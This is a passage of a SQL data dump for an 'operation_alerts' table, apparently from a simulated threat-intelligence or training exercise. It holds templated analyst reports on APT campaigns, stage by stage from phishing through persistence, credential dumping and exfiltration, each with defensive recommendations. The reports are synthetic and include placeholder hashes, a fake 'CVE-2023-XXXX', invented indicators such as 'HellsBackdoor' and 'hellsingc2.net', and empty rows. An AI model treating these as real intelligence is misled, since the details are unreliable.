(660, 133, 1188, 2, 'Persistence Mechanisms in Use', '## Persistence Mechanisms in Use\n\n### Overview\nAfter successfully deploying the PlugX malware, Calypso APT has moved to ensure persistence within the compromised systems. This is a critical step for maintaining long-term access and control.\n\n### Techniques Observed\n- **Backdoor Creation:** The adversary has installed hidden backdoors to facilitate ongoing access.\n- **Registry Manipulation:** Modifications to the Windows Registry have been made to ensure the malware runs on startup.\n\n### Recommendations\n- Conduct regular audits of system registries for unauthorized changes.\n- Deploy endpoint detection and response (EDR) solutions to identify and mitigate persistence mechanisms.', '2026-02-07 21:23:06'),
(661, 133, 1189, 3, 'Lateral Movement Tactics', '## Lateral Movement Tactics\n\n### Overview\nCalypso APT has begun to move laterally across the network, indicating an escalation in their campaign objectives. This movement is likely aimed at gaining access to more sensitive systems and data.\n\n### Techniques Utilized\n- **Credential Dumping:** Harvesting credentials from compromised systems to access other network resources.\n- **Remote Desktop Protocol (RDP):** Exploiting RDP to move between systems.\n\n### Recommendations\n- Monitor for unusual login activities, especially those involving RDP.\n- Implement multi-factor authentication to reduce the risk of credential theft.', '2026-02-07 21:23:06'),
(662, 133, 1190, 4, 'Data Exfiltration Activities Detected', '## Data Exfiltration Activities Detected\n\n### Overview\nThe final stage of Calypso APT\'s operation involves the exfiltration of data from compromised systems. This phase is critical as it signifies the culmination of their espionage activities.\n\n### Observed Methods\n- **Encrypted Channels:** Data is being exfiltrated through encrypted tunnels to evade detection.\n- **Steganography:** Embedding data within innocuous files to bypass security controls.\n\n### Recommendations\n- Deploy network monitoring tools to detect unusual data transfers.\n- Analyze outbound traffic for signs of encrypted data packets or steganographic content.', '2026-02-07 21:23:06'),
(663, 133, 1191, 5, NULL, NULL, '2026-02-07 21:23:06'),
(664, 134, 1192, 1, 'Execution of HyperBro Backdoor - Analysis and Indicators', '### Context\nFollowing the detection of a suspicious email with a malicious payload, further analysis has revealed the deployment of the HyperBro backdoor. This sophisticated malware is known for its ability to facilitate remote access and control over compromised systems.\n\n### Key Indicators\n- **File Name:** [malicious_file.exe]\n- **Hash:** [Insert SHA256 hash here]\n- **C2 Server:** [C2 Server IP]\n\n### Next Steps\n- Monitor network traffic for connections to known C2 servers.\n- Conduct memory analysis on affected systems to identify any active HyperBro processes.\n\n### Additional Insights\nAPT27 often employs HyperBro as a primary tool to establish a foothold within networks. This stage marks a critical point where attackers can begin to expand control.', '2026-02-07 21:23:28'),
(665, 134, 1193, 2, 'Establishing Persistence - Registry Modification Overview', '### Context\nUpon the execution of the HyperBro backdoor, attackers aim to ensure their presence within the system. This is typically achieved through persistence mechanisms such as registry modifications.\n\n### Key Indicators\n- **Registry Key:** HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n- **Modified Entries:** [Insert modified registry entry here]\n\n### Next Steps\n- Review registry changes and confirm legitimacy.\n- Implement continuous monitoring of registry activities.\n\n### Additional Insights\nPersistence is crucial for APT27 to maintain access and avoid detection during subsequent phases of their attack. Understanding these modifications can aid in early detection and response.', '2026-02-07 21:23:28'),
(666, 134, 1194, 3, 'Credential Dumping and Lateral Movement Tactics', '### Context\nWith persistence established through registry modifications, APT27 is likely to perform credential dumping as a precursor to lateral movement within the network.\n\n### Key Indicators\n- **Tools Used:** Mimikatz, ProcDump\n- **Targeted Accounts:** System administrators, privileged users\n\n### Next Steps\n- Conduct forensic analysis on systems showing signs of credential dumping.\n- Implement multi-factor authentication to mitigate the risk of unauthorized access.\n\n### Additional Insights\nLateral movement allows attackers to escalate privileges and access sensitive areas within the network. Early detection of credential dumping activities can significantly reduce the attack surface.', '2026-02-07 21:23:28'),
(667, 134, 1195, 4, 'Data Exfiltration - Protecting Military Technology', '### Context\nAPT27\'s ultimate goal in this operation is to exfiltrate sensitive military technology data. This is typically achieved by leveraging the access gained through lateral movement.\n\n### Key Indicators\n- **Data Types:** CAD files, proprietary aerospace designs\n- **Exfiltration Channels:** HTTPS, FTP\n\n### Next Steps\n- Implement data loss prevention (DLP) solutions to monitor and block unauthorized data transfers.\n- Conduct a thorough review of data access logs to identify potential leaks.\n\n### Additional Insights\nProtecting sensitive military data is of utmost importance. Understanding APT27\'s exfiltration methods can aid in developing robust defenses to safeguard critical information.', '2026-02-07 21:23:28'),
(668, 134, 1196, 5, NULL, NULL, '2026-02-07 21:23:28'),
(669, 135, 1197, 1, 'Analysis of Initial Access Attempt', '## Overview\nAfter the detection of a suspicious access attempt, further analysis of network logs revealed a pattern consistent with known Axiom intrusion tactics.\n\n### Key Findings\n- **Access Vector**: The attempt was made through a spear-phishing email containing a malicious PDF attachment.\n- **Target**: The email was sent to a senior member of an NGO known for its advocacy in human rights.\n\n### Implications\nThis access vector suggests that Axiom is targeting high-profile NGO personnel to gain initial footholds in their networks. This aligns with their typical modus operandi of using social engineering tactics to bypass initial defenses.\n\n### Next Steps\n- Monitor for any successful execution of malicious payloads tied to this access attempt.\n- Enhance email filtering and user education to mitigate future phishing attempts.', '2026-02-07 21:23:36'),
(670, 135, 1198, 2, 'Hikit Rootkit Execution Detected', '## Overview\nFollowing the initial access attempt, the Hikit rootkit has been executed on the compromised system.\n\n### Key Findings\n- **Persistence Mechanism**: The rootkit has established persistence via Windows service manipulation, a hallmark of Axiom\'s sustained access tactics.\n- **Stealth Features**: The rootkit employs advanced evasion techniques by injecting itself into legitimate processes.\n\n### Implications\nThe execution of the Hikit rootkit signifies that Axiom has moved beyond initial access to establish a sustained presence within the network, likely to facilitate long-term espionage activities.\n\n### Next Steps\n- Conduct a full forensic investigation on the affected systems to determine the extent of compromise.\n- Prepare for potential data exfiltration activities, as this typically follows rootkit deployment in Axiom operations.', '2026-02-07 21:23:36'),
(671, 135, 1199, 3, NULL, NULL, '2026-02-07 21:23:36'),
(672, 136, 1200, 1, 'Analysis of Spear Phishing Tactics', '## Overview\nFollowing the detection of a spear phishing email targeting tech and defense sectors, APT17 appears to be refining their social engineering tactics. The email was tailored with industry-specific jargon and appeared to originate from a trusted source.\n\n## Key Findings\n- **Sender Impersonation**: The sender\'s email domain closely resembled a legitimate partner organization, suggesting the use of domain spoofing.\n- **Payload Delivery**: The email included a malicious attachment disguised as a quarterly financial report.\n\n## Recommendations\n- **Email Filtering**: Enhance email filtering systems to detect and quarantine emails with suspicious domains.\n- **Employee Training**: Conduct regular awareness sessions for employees to recognize phishing attempts.', '2026-02-07 21:24:15'),
(673, 136, 1201, 2, 'Dissecting Malicious Payload Execution', '## Overview\nFollowing detection of the spear phishing email, a malicious payload was executed on a compromised system. This payload is suspected to be a variant of the Gh0st RAT, known for its stealth capabilities.\n\n## Key Findings\n- **Payload Analysis**: The payload exhibited obfuscation techniques, hindering detection by conventional antivirus systems.\n- **Command and Control (C2) Communication**: Established a connection to a known APT17 IP address.\n\n## Recommendations\n- **Network Monitoring**: Implement deep packet inspection to identify anomalous outbound traffic.\n- **Endpoint Security**: Deploy advanced endpoint detection and response (EDR) tools to identify and mitigate threats.', '2026-02-07 21:24:15'),
(674, 136, 1202, 3, 'Registry Modification Insights', '## Overview\nFollowing the execution of the payload, registry modifications were detected, indicating efforts to establish persistence.\n\n## Key Findings\n- **Registry Changes**: Alterations were made to the \'Run\' keys, allowing the malware to execute upon system startup.\n- **Scheduled Tasks**: New tasks were created to maintain persistence even after system reboots.\n\n## Recommendations\n- **Registry Monitoring**: Implement continuous monitoring of critical system registries.\n- **Incident Response**: Conduct a thorough investigation to identify and remove persistence mechanisms.', '2026-02-07 21:24:15'),
(675, 136, 1203, 4, 'Credential Dumping Activity Detected', '## Overview\nCredential dumping activity was observed, a common technique used by APT17 to facilitate lateral movement within the targeted network.\n\n## Key Findings\n- **Tools Used**: Mimikatz was employed to extract credentials from the Local Security Authority Subsystem Service (LSASS).\n- **Lateral Movement**: Stolen credentials were used to access additional systems, expanding the attack surface.\n\n## Recommendations\n- **Credential Hygiene**: Enforce multi-factor authentication and regular password changes.\n- **Monitoring and Alerts**: Enhance logging and alerting for suspicious account activities.', '2026-02-07 21:24:15'),
(676, 136, 1204, 5, NULL, NULL, '2026-02-07 21:24:15'),
(677, 137, 1205, 1, 'In-Depth Analysis of Suspicious Web Traffic Patterns', '## Overview\n\nFollowing the detection of suspicious web traffic, an investigation was initiated to analyze the patterns and identify potential sources.\n\n## Key Findings\n- **Watering Hole Tactics**: The traffic originated from a compromised legitimate Japanese website frequently visited by enterprise employees. This aligns with APT17\'s known watering hole tactics.\n- **Exploit Delivery**: Analysis of the traffic revealed the delivery of an exploit targeting the CVE-2013-3893 vulnerability in Internet Explorer.\n\n## Next Steps\nMonitoring for any attempts to execute malware leveraging the exploit is essential to mitigate potential breaches.', '2026-02-07 21:24:22'),
(678, 137, 1206, 2, 'Malware Execution Attempt: Dissecting the Payload', '## Overview\n\nA malware execution attempt was logged shortly after the initial access was detected. Detailed analysis of the payload provides further insights.\n\n## Key Findings\n- **Payload Characteristics**: The malware leverages the CVE-2013-3893 vulnerability to bypass security protocols and execute on target systems.\n- **APT17 Signature**: The code shows similarities with past APT17 campaigns, confirming their involvement.\n\n## Next Steps\nEfforts should focus on identifying any persistence mechanisms established by the malware to maintain access.', '2026-02-07 21:24:22'),
(679, 137, 1207, 3, 'Persistence Mechanism Uncovered: Ensuring Continued Access', '## Overview\n\nAfter the malware execution, a persistence mechanism was established to ensure long-term access to the compromised systems.\n\n## Key Findings\n- **Registry Alterations**: The malware modifies Windows registry keys to achieve persistence.\n- **Scheduled Tasks**: New tasks are created to ensure the malware runs at system startup.\n\n## Next Steps\nInvestigation should now concentrate on detecting lateral movement activities as the threat actors attempt to spread within the network.', '2026-02-07 21:24:22'),
(680, 137, 1208, 4, 'Detecting Lateral Movement: APT17\'s Expansion Techniques', '## Overview\n\nLateral movement within the network was detected, indicating an attempt to expand the attack\'s reach.\n\n## Key Findings\n- **Credential Dumping**: The attackers used credential dumping tools to obtain legitimate credentials for use during lateral movement.\n- **Remote Execution**: Tools such as PsExec were employed for remote execution on additional systems.\n\n## Next Steps\nIt\'s critical to monitor for any data exfiltration attempts and ensure robust defenses are in place to block them.', '2026-02-07 21:24:22'),
(681, 137, 1209, 5, NULL, NULL, '2026-02-07 21:24:22'),
(682, 138, 1210, 1, 'Initial Analysis of Suspicious Network Traffic', '# Initial Analysis of Suspicious Network Traffic\n\n## Overview\nFollowing the detection of suspicious network traffic, preliminary analysis has revealed potential signs of initial access by APT17 into the systems of targeted policy think tanks.\n\n## Key Observations\n- **Unusual IP Addresses**: Network logs show connections from IP addresses not previously associated with authorized users.\n- **Anomalous Activity Patterns**: Access attempts were made during off-hours, suggesting potential unauthorized access.\n\n## Recommendations\n- Implement immediate network segmentation to restrict further unauthorized access.\n- Begin monitoring for JavaScript injection attempts, as this aligns with known APT17 tactics.', '2026-02-07 21:25:01'),
(683, 138, 1211, 2, 'Detection and Analysis of JavaScript Injection', '# Detection and Analysis of JavaScript Injection\n\n## Overview\nJavaScript injection has been detected on multiple websites associated with the targeted think tanks, confirming the next stage of APT17\'s attack strategy.\n\n## Key Indicators\n- **Injection Points**: Several scripts injected into public-facing websites, designed to load additional malicious components.\n- **Payload Analysis**: Initial scripts designed to deploy further payloads to establish persistence.\n\n## Recommendations\n- Conduct a thorough code review of all web properties to identify and remove injected scripts.\n- Enhance web application firewalls to detect and block further injection attempts.', '2026-02-07 21:25:01'),
(684, 138, 1212, 3, 'Persistence Mechanisms Established by Malicious Code', '# Persistence Mechanisms Established by Malicious Code\n\n## Overview\nFollowing successful JavaScript injection, APT17 has established persistence within compromised systems, allowing continued access even after system reboots.\n\n## Persistence Techniques\n- **Registry Modifications**: Alterations detected in system registry keys to ensure malware execution at startup.\n- **Scheduled Tasks**: Malicious tasks scheduled to run at regular intervals, maintaining a foothold.\n\n## Recommendations\n- Conduct system-wide scans for registry and task anomalies.\n- Implement strict group policies to prevent unauthorized changes to system configurations.', '2026-02-07 21:25:01'),
(685, 138, 1213, 4, 'Lateral Movement Tactics Observed', '# Lateral Movement Tactics Observed\n\n## Overview\nEvidence indicates that APT17 has begun lateral movement within the network, potentially targeting additional systems and sensitive data.\n\n## Tactics Identified\n- **Credential Dumping**: Use of credential harvesting techniques to access additional systems.\n- **Remote Desktop Protocol (RDP)**: Unauthorized RDP sessions observed, indicating an attempt to expand access.\n\n## Recommendations\n- Implement network segmentation to limit lateral movement.\n- Enforce multi-factor authentication to protect against credential misuse.', '2026-02-07 21:25:01'),
(686, 138, 1214, 5, NULL, NULL, '2026-02-07 21:25:01'),
(687, 139, 1215, 1, 'Analysis of Phishing Email Vector', '## Overview\n\nFollowing the detection of a suspicious phishing email, an analysis has been conducted to understand the delivery mechanism and potential targets. The email was crafted to appear as a legitimate communication from a trusted defense contractor partner.\n\n## Email Characteristics\n\n- **Subject Line**: \"Urgent: Action Required on Contract Updates\"\n- **Sender**: impersonated a known contact in the industry.\n- **Attachments**: Contained a malicious document exploiting CVE-2014-1776.\n\n## Next Steps\n\nThe execution of the malicious script within the document is expected to be the next step, potentially leading to unauthorized code execution on the user\'s system.', '2026-02-07 21:28:29'),
(688, 139, 1216, 2, 'Malicious Script Execution Analysis', '## Overview\n\nAfter the malicious script execution alert, further investigation revealed the script\'s role in the attack chain. This script exploits CVE-2014-1776 to execute arbitrary code on the target systems.\n\n## Key Findings\n\n- **Script Behavior**: The script initiates a connection to a remote server, downloading additional payloads.\n- **Exploitation**: Utilizes Internet Explorer vulnerabilities to bypass security measures.\n\n## Implications\n\nThe successful execution of this script likely led to the installation of the Pirpi backdoor, providing persistent access to the compromised systems.', '2026-02-07 21:28:29'),
(689, 139, 1217, 3, 'Pirpi Backdoor Installation Details', '## Overview\n\nThe persistence stage of the attack was marked by the installation of the Pirpi backdoor. This malware is critical for maintaining access to compromised systems.\n\n## Technical Details\n\n- **Installation Method**: Installed as a service, ensuring it runs with system privileges.\n- **Capabilities**: Allows remote command execution, file transfers, and further malware deployment.\n\n## Impact\n\nWith the backdoor installed, the attackers can now attempt to access credentials, escalating their control over the network infrastructure.', '2026-02-07 21:28:29'),
(690, 139, 1218, 4, 'Credential Access and Exfiltration Preparation', '## Overview\n\nFollowing the detection of unauthorized credential access, it is crucial to understand the attackers\' motives and methods for exfiltrating sensitive information.\n\n## Observations\n\n- **Credential Harvesting**: Attackers used the Pirpi backdoor to capture login credentials from memory.\n- **Targeted Accounts**: Focus on administrative and high-privilege accounts.\n\n## Next Stage\n\nThe attackers are likely preparing for large-scale data exfiltration using encrypted channels to avoid detection. Monitoring for unusual network activities is essential to mitigate further risks.', '2026-02-07 21:28:29'),
(691, 139, 1219, 5, NULL, NULL, '2026-02-07 21:28:29'),
(692, 140, 1220, 1, 'Phishing Campaign Analysis', '### Overview\nThe initial access vector leveraged by APT3 involves a sophisticated phishing campaign targeting key personnel within organizations. The emails are highly tailored, often using spear-phishing techniques to increase the likelihood of success.\n\n### Key Indicators\n- **Email Subjects:** Typically reference urgent business matters or IT notifications.\n- **Attachments:** Microsoft Word documents or PDFs containing embedded malicious scripts.\n\n### Recommendations\n- Implement advanced email filtering solutions.\n- Conduct employee awareness training sessions focusing on phishing detection.\n\n### Next Steps\nPrepare for potential exploitation attempts, as this report indicates a successful initial access attempt.', '2026-02-07 21:28:52'),
(693, 140, 1221, 2, 'Exploit Code Execution Details', '### Overview\nAPT3 has executed exploit code targeting the Adobe Flash Zero-Day vulnerability, CVE-2015-3113. This vulnerability allows remote code execution on vulnerable systems.\n\n### Technical Details\n- **Vulnerability:** CVE-2015-3113\n- **Affected Systems:** Adobe Flash Player versions prior to 18.0.0.194.\n- **Exploit Delivery:** Often delivered through compromised web pages or malicious email attachments.\n\n### Mitigation Strategies\n- Ensure all systems are updated to the latest version of Adobe Flash Player.\n- Deploy intrusion detection systems to monitor for exploit signatures.\n\n### Next Steps\nExpect APT3 to establish persistence mechanisms following successful exploitation.', '2026-02-07 21:28:52'),
(694, 140, 1222, 3, 'Persistence Mechanisms Employed', '### Overview\nFollowing the successful execution of exploit code, APT3 establishes persistence within the compromised network. This involves deploying a custom backdoor that allows continuous access to the target.\n\n### Backdoor Characteristics\n- **File Name:** Varies per deployment, often masquerading as legitimate system files.\n- **Communication Protocols:** Utilizes HTTP or HTTPS to communicate with command-and-control (C2) servers.\n\n### Detection and Response\n- Conduct regular checks for unauthorized system modifications.\n- Implement endpoint detection and response (EDR) solutions to identify unusual behaviors.\n\n### Next Steps\nPrepare for possible lateral movement activities as APT3 attempts to expand its foothold within the network.', '2026-02-07 21:28:52'),
(695, 140, 1223, 4, 'Credential Compromise and Lateral Movement', '### Overview\nAPT3 engages in lateral movement using stolen credentials obtained from compromised systems. This phase of the operation aims to escalate privileges and access sensitive data across the network.\n\n### Techniques Used\n- **Credential Dumping:** Tools like Mimikatz used to extract credentials from memory.\n- **Pass-the-Hash:** Exploiting NTLM hashes to authenticate without knowing the actual password.\n\n### Defensive Measures\n- Enforce multi-factor authentication (MFA) across all critical systems.\n- Regularly audit and rotate privileged account credentials.\n\n### Next Steps\nAnticipate data exfiltration attempts as APT3 seeks to extract valuable information from the network.', '2026-02-07 21:28:52'),
(696, 140, 1224, 5, NULL, NULL, '2026-02-07 21:28:52'),
(697, 141, 1225, 1, 'Analysis of Unusual Flash Script Execution', '## Contextual Overview\nFollowing the detection of a suspicious Flash exploit, our team has observed **unusual execution patterns** of Flash scripts across several endpoints. This activity indicates a potential exploitation chain in progress.\n\n## Key Findings\n- **Execution Vector**: The Flash script seems to be leveraging a zero-day vulnerability to initiate execution without user interaction.\n- **Network Activity**: Unusual outbound traffic was detected, possibly linked to command and control (C2) communications.\n\n## Recommendations\n- **Immediate Mitigation**: Isolate affected systems and initiate a detailed forensic analysis to understand the full scope of the execution.\n- **Update Policies**: Apply strict execution policies to limit script activities and monitor for similar patterns in other systems.', '2026-02-07 21:29:13'),
(698, 141, 1226, 2, 'Pirpi Malware Persistence Mechanism Uncovered', '## Contextual Overview\nSubsequent to the unusual Flash script execution, forensic analysis has identified the deployment of **Pirpi malware**. This malware is known for its sophisticated persistence mechanisms.\n\n## Key Findings\n- **Persistence Techniques**: The malware employs registry manipulation and scheduled tasks to maintain persistence even after system reboots.\n- **File Artifacts**: Several suspicious DLL files have been identified in system directories, supporting the persistence of Pirpi.\n\n## Recommendations\n- **Containment Measures**: Remove identified persistence mechanisms and scan for additional instances of Pirpi across the network.\n- **System Hardening**: Implement advanced endpoint security measures and regular audits to detect persistence anomalies.', '2026-02-07 21:29:13'),
(699, 141, 1227, 3, 'Investigation of Lateral Movement via Windows Exploit', '## Contextual Overview\nIn the aftermath of discovering Pirpi’s persistence, our team has detected **lateral movement** activities utilizing a Windows zero-day exploit. This points towards an effort to spread within the network.\n\n## Key Findings\n- **Movement Tactics**: The adversary is exploiting a vulnerability in Windows to gain higher privileges and move laterally across systems.\n- **Compromised Accounts**: Several user accounts have shown unauthorized access patterns, likely used to facilitate lateral movement.\n\n## Recommendations\n- **Access Control**: Reset credentials of compromised accounts and enforce multi-factor authentication (MFA) across the domain.\n- **Patch Management**: Prioritize patching of the identified Windows vulnerability and enhance monitoring of lateral movement indicators.', '2026-02-07 21:29:13'),
(700, 141, 1228, 4, 'Data Exfiltration Pathways and Mitigation Strategies', '## Contextual Overview\nFollowing the lateral movement detection, evidence points to **data exfiltration** activities aimed at siphoning sensitive information from compromised systems.\n\n## Key Findings\n- **Exfiltration Channels**: Data is being exfiltrated via encrypted channels, likely leveraging HTTPS or DNS tunneling.\n- **Targeted Data**: Preliminary analysis suggests that sensitive corporate and personal data are being targeted for extraction.\n\n## Recommendations\n- **Data Loss Prevention (DLP)**: Deploy DLP solutions to monitor and block unauthorized data transfers.\n- **Traffic Analysis**: Conduct a thorough review of outbound traffic logs to identify and block exfiltration attempts.\n- **Incident Response**: Engage incident response teams to assess the full impact and coordinate a strategic recovery plan.', '2026-02-07 21:29:13'),
(701, 141, 1229, 5, NULL, NULL, '2026-02-07 21:29:13'),
(702, 142, 1230, 1, 'Elise Backdoor Activation Analysis', '## Overview\nAfter identifying the spear phishing email with a malicious attachment, further investigation revealed the activation of the Elise backdoor. This sophisticated malware is known for its stealth and effectiveness in gaining unauthorized access to targeted systems.\n\n## Key Findings\n- **Target Scope**: The backdoor was programmed to activate upon opening the malicious attachment, specifically targeting military personnel.\n- **Activation Method**: Utilizes a hidden script within the attachment that executes upon opening.\n- **Initial Indicators**: Sudden outbound communication to known command and control (C2) servers linked to Lotus Blossom.\n\n## Next Steps\nPrepare for detection of persistence mechanisms as the adversary seeks to maintain access.', '2026-02-07 21:48:01'),
(703, 142, 1231, 2, 'Persistence Mechanisms Identified', '## Overview\nFollowing the execution of the Elise backdoor, our team has successfully identified the persistence mechanisms employed by the threat actors. Understanding these methods is critical for preventing further unauthorized access.\n\n## Key Findings\n- **Registry Modifications**: Alterations made to the Windows Registry to ensure the backdoor loads upon system startup.\n- **Service Creation**: New services created, disguised as legitimate system processes, to maintain active connections to C2 infrastructure.\n- **Scheduled Tasks**: Task Scheduler used to periodically execute scripts that check for backdoor updates.\n\n## Recommendations\nFocus on monitoring internal network traffic for signs of lateral movement as the adversary attempts to expand their foothold.', '2026-02-07 21:48:01'),
(704, 142, 1232, 3, 'Lateral Movement Detection and Analysis', '## Overview\nIn response to the established persistence mechanisms, activity indicating lateral movement within the network has been detected. This step involves the threat actors exploring and expanding their access across the network.\n\n## Key Findings\n- **Internal Scanning**: Use of tools to identify and map the internal network, searching for vulnerable systems and credentials.\n- **Credential Harvesting**: Capturing of administrative credentials through keylogging and memory scraping techniques.\n- **Remote Execution**: Deployment of the Elise backdoor to additional systems to widen the attack surface.\n\n## Strategic Actions\nImplement enhanced monitoring on critical data storage systems to prepare for potential data exfiltration activities.', '2026-02-07 21:48:01'),
(705, 142, 1233, 4, 'Data Exfiltration via Encrypted Channels', '## Overview\nThe culmination of the espionage campaign involves the exfiltration of sensitive data, which is a crucial phase for the threat actors. Observations confirm the use of encrypted channels to obfuscate data transfer activities.\n\n## Key Findings\n- **Encryption Use**: Data packets are encrypted before transmission, making detection through traditional monitoring methods challenging.\n- **C2 Communication**: Increased communication frequency with external servers, suggesting active data transfer operations.\n- **Exfiltration Targets**: Primarily focused on acquiring classified military documents and personnel records.\n\n## Countermeasures\nDeploy advanced threat detection tools capable of analyzing encrypted traffic patterns and conduct a comprehensive audit of sensitive data access logs.', '2026-02-07 21:48:01'),
(706, 142, 1234, 5, NULL, NULL, '2026-02-07 21:48:01'),
(707, 143, 1235, 1, 'Analysis of Initial Access via Phishing', '### Overview\nAfter the initial alert regarding the phishing email targeting Naikon, further analysis reveals the use of a spear-phishing campaign. The email spoofed a known contact and contained a malicious Word document. Upon opening, a macro executed, leading to the download of additional payloads.\n\n### Indicators of Compromise (IoCs)\n- **Email Subject:** \"Urgent: Updated Protocols\"\n- **Sender Address:** spoofed@contact.com\n- **Attachment Name:** \"Protocols.docx\"\n- **Domain:** attackercontrolled.com\n\n### Next Steps\nInvestigators should focus on identifying the payload downloaded by the macro and any secondary actions triggered by the document. This will provide insight into the vulnerabilities targeted during execution.', '2026-02-07 21:48:07');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(708, 143, 1236, 2, 'Exploitation of Office Vulnerability', '### Overview\nFollowing the phishing incident, further investigation has confirmed that the malicious document exploited a known vulnerability in Microsoft Office. This vulnerability allowed remote code execution, providing attackers with the ability to execute arbitrary commands on the compromised system.\n\n### Technical Details\n- **CVE Identifier:** CVE-2023-XXXX\n- **Vulnerability Type:** Remote Code Execution (RCE)\n- **Patch Status:** Unpatched systems are vulnerable\n\n### Recommendations\n- Ensure all Office software is updated with the latest security patches.\n- Conduct scans to identify other potentially vulnerable systems within the network.\n\n### Next Steps\nThe focus should now shift to identifying how the attackers maintain persistence and what backdoor mechanisms have been employed.', '2026-02-07 21:48:07'),
(709, 143, 1237, 3, 'Establishment of Backdoor Persistence', '### Overview\nAnalysis indicates that the threat actors have established persistence through a custom backdoor known to be used by the Hellsing group. This backdoor allows continued remote access to compromised systems, facilitating further exploitation and data exfiltration.\n\n### Backdoor Characteristics\n- **Backdoor Name:** HellsBackdoor\n- **Communication Protocol:** Encrypted HTTP/S\n- **C2 Servers:** identified at hellsingc2.net\n\n### Mitigation Strategies\n- Deploy network monitoring to identify unusual outbound traffic.\n- Isolate compromised systems to prevent lateral movement.\n\n### Next Steps\nInvestigators should focus on identifying lateral movement within the network, specifically looking for signs of credential dumping and privilege escalation.', '2026-02-07 21:48:07'),
(710, 143, 1238, 4, 'Credential Dumping and Lateral Movement Analysis', '### Overview\nEvidence has surfaced that the Hellsing group has successfully performed credential dumping on targeted systems. Utilizing stolen credentials, they achieved lateral movement across the network, elevating privileges and accessing sensitive data.\n\n### Tools and Techniques\n- **Credential Dumping Tool:** Mimikatz\n- **Privilege Escalation Method:** Pass-the-Hash\n- **Targeted Systems:** Domain Controllers, Email Servers\n\n### Recommendations\n- Implement multi-factor authentication (MFA) to mitigate the risk of credential reuse.\n- Monitor for anomalous login attempts and access patterns.\n\n### Next Steps\nAttention must be directed towards potential data exfiltration activities, including monitoring for unauthorized data transfers to external servers.', '2026-02-07 21:48:07'),
(711, 143, 1239, 5, NULL, NULL, '2026-02-07 21:48:07'),
(712, 144, 1240, 1, 'Analysis of the Phishing Attack Vector', '### Overview\nFollowing the detection of suspicious email infiltration, further analysis was conducted on the phishing attack vector used by Tropic Trooper. The emails were crafted with high specificity, targeting key personnel within the military and government sectors of Taiwan and the Philippines.\n\n### Technical Details\n- **Email Headers:** Analysis of email headers revealed spoofed sender addresses mimicking legitimate government entities.\n- **Payload:** Attached documents contained malicious macros that, when enabled, initiated the download of additional malware.\n- **Targets:** Specifically aimed at individuals involved in defense strategy and policy planning.\n\n### Recommendations\n1. **Enhanced Email Filtering:** Implement advanced filtering techniques to identify and quarantine suspicious emails.\n2. **User Training:** Conduct security awareness training focusing on phishing attack recognition.\n\nThis report provides context for the next alert, anticipating potential malware execution on compromised systems.', '2026-02-07 21:48:09'),
(713, 144, 1241, 2, 'Investigation into Malware Execution on Compromised Systems', '### Overview\nUpon execution of the malicious payload from the phishing attack, our systems detected the deployment of malware across compromised networks. This report delves into the characteristics of the malware used by Tropic Trooper.\n\n### Malware Characteristics\n- **Type:** The malware is identified as a variant of the \"Yahoyah\" trojan, custom-modified for stealth and persistence.\n- **Capabilities:** It can perform keylogging, screen capturing, and remote command execution.\n- **Propagation:** Utilizes lateral movement techniques to spread across connected systems.\n\n### Mitigation Measures\n1. **Isolation Protocols:** Immediately isolate infected machines from the network.\n2. **Network Monitoring:** Enhance network traffic monitoring to detect abnormal activities.\n\nThis report sets the stage for understanding the subsequent alert concerning data exfiltration via unusual network traffic.', '2026-02-07 21:48:09'),
(714, 144, 1242, 3, NULL, NULL, '2026-02-07 21:48:09'),
(715, 145, 1243, 1, 'Analysis of ShadowPad Backdoor Deployment', '### Overview\nFollowing the initial access via the phishing email, intelligence has identified the deployment of the ShadowPad backdoor. This malware is known for its modular architecture and ability to evade detection.\n\n### Technical Details\n- **Entry Point:** The phishing email contained a malicious attachment that executed a script to download ShadowPad.\n- **Behavior:** Once executed, ShadowPad establishes a persistent connection to a command and control server, allowing remote access to the compromised system.\n\n### Insight\nIt is crucial to monitor network traffic for connections to known ShadowPad C2 servers to detect and mitigate the threat early.\n\n### Next Steps\nPrepare for potential persistence mechanisms that may be deployed to maintain access.', '2026-02-07 21:48:51'),
(716, 145, 1244, 2, 'Scheduled Task: Persistence Mechanism Insight', '### Overview\nAfter executing the ShadowPad backdoor, adversaries are likely to establish persistence to ensure continued access to the compromised system.\n\n### Key Observations\n- **Method Used:** A scheduled task has been created to execute the ShadowPad malware at regular intervals.\n- **Detection:** Look for unusual scheduled tasks, especially those executing binaries from uncommon locations.\n\n### Insight\nUnderstanding the persistence mechanism helps in developing strategies to neutralize the threat, such as auditing and removing unauthorized scheduled tasks.\n\n### Next Steps\nAnticipate lateral movement attempts which may involve credential dumping techniques.', '2026-02-07 21:48:51'),
(717, 145, 1245, 3, 'Credential Dumping with Cobalt Strike', '### Overview\nWith persistence established, the operation is now advancing to lateral movement, facilitated by Cobalt Strike\'s capabilities.\n\n### Technical Details\n- **Objective:** Obtain credentials to access other network systems.\n- **Tools Used:** Cobalt Strike, known for its powerful credential harvesting features.\n\n### Insight\nCredential dumping poses a significant risk as it can lead to further system compromises. Monitoring for unusual authentication patterns is essential.\n\n### Next Steps\nPrepare defenses against potential data exfiltration by enhancing network monitoring and data loss prevention measures.', '2026-02-07 21:48:51'),
(718, 145, 1246, 4, 'Data Exfiltration Tactics and Mitigation', '### Overview\nThe final stage of the operation involves the exfiltration of sensitive data, potentially impacting governmental entities significantly.\n\n### Observed Methods\n- **Data Exfiltration Channels:** Use of encrypted channels to mask data transfer.\n- **Targets:** Sensitive files and databases identified during the lateral movement stage.\n\n### Insight\nUnderstanding and disrupting data exfiltration channels is critical to safeguarding sensitive information. Implementing strict network egress controls can help detect and prevent unauthorized data transfers.\n\n### Conclusion\nBy analyzing each step of the attack chain, defenses can be strengthened to prevent future intrusions and protect critical data assets.', '2026-02-07 21:48:51'),
(719, 145, 1247, 5, NULL, NULL, '2026-02-07 21:48:51'),
